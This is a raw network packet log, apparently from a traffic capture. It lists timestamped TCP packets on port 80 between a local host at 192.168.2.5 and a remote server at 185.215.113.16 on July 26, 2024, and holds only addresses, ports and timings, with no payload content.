Jul 26, 2024 17:56:20.910847902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910847902 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910851955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910861015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910871029 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910880089 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910881996 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910888910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910897970 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.910919905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910919905 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.910960913 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911570072 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911663055 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911674023 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911683083 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911691904 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911700964 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911710978 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911721945 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911725998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911736012 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911745071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911756039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911765099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911767960 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911767960 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911775112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911784887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911794901 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911802053 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911804914 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911815882 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911825895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911835909 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911844969 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911854982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911859035 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911859035 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911864996 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911874056 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.911904097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911904097 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.911916971 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912689924 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912700891 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912709951 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912719965 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912729979 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912729979 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912744999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912755013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912765026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912772894 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912774086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912784100 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912791967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912791967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912794113 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912802935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912812948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912821054 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912826061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912826061 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912831068 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912841082 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912851095 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912861109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912870884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912879944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912885904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912885904 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912889957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912899971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.912909031 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912930012 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.912970066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913532972 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913542986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913552046 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913562059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913570881 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913580894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913593054 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913593054 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913594961 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913605928 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913615942 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913625002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913634062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913642883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913651943 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913661003 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913671017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913671017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913681030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913688898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913688898 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913707972 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913708925 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913721085 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913729906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913737059 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913739920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913748980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913758039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.913780928 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913780928 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.913861036 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914304018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914314032 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914319038 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914385080 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914385080 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914459944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914469957 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914479017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914489031 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914500952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914518118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914526939 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914529085 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914537907 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914549112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914558887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914562941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914566994 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914566994 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914572001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914577007 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914582968 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914586067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914596081 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914606094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914616108 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914625883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914627075 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914635897 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914645910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.914659023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914694071 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.914694071 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915426016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915437937 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915446997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915456057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915467024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915477037 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915481091 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915492058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915502071 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915510893 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915520906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915524006 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915524006 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915530920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915539980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915549994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915556908 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915558100 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915559053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915569067 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915577888 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915585995 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915589094 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915597916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915608883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915617943 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915620089 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915626049 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915636063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.915652990 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915657997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915705919 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.915952921 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916275024 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916292906 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916304111 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916312933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916322947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916332006 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916337013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916347027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916353941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916377068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916377068 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916410923 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916461945 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916471958 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916487932 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916512966 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916548967 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916794062 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916804075 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916814089 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916841984 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916887045 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916896105 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916907072 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916918039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.916932106 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916932106 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916965008 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.916990042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917001009 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917011976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917052984 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917117119 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917144060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917155027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917165995 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917176962 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917179108 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917187929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917197943 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917208910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917212963 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917220116 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917247057 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917254925 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917448044 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917464018 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917474985 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917484999 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917496920 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917506933 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917516947 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917529106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917540073 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917551994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917556047 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917556047 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917556047 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917562962 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917565107 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917573929 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917584896 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917594910 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917606115 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.917615891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917615891 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.917644024 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.928704023 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.933024883 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992477894 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992539883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992552042 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992558002 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992575884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992579937 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992584944 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992597103 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992607117 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992614031 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992636919 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992650032 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992661953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992664099 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992664099 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992675066 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992685080 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992702007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992702007 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992733002 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992765903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992777109 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992786884 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992798090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992809057 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992819071 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992851973 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992851973 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992930889 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992954016 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992964983 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992974997 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992986917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.992997885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992997885 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.992999077 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993010998 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993020058 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993025064 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993031979 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993045092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993055105 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993065119 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993072033 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993072033 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993076086 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993081093 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993091106 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993108034 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993113041 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993113041 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993159056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993159056 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993446112 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993458033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993463039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993468046 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993473053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993489027 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993495941 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993505955 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993516922 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993526936 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993537903 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993547916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:20.993551970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993551970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993551970 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993586063 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:20.993599892 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.010852098 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.010874033 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.010885000 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.010895967 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.010906935 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.010921001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.010931015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011003017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011003017 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011032104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011042118 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011054039 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011064053 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011075020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011080027 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011117935 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011117935 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:21.011149883 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:21.011187077 CEST	49705	80	192.168.2.5	185.215.113.16
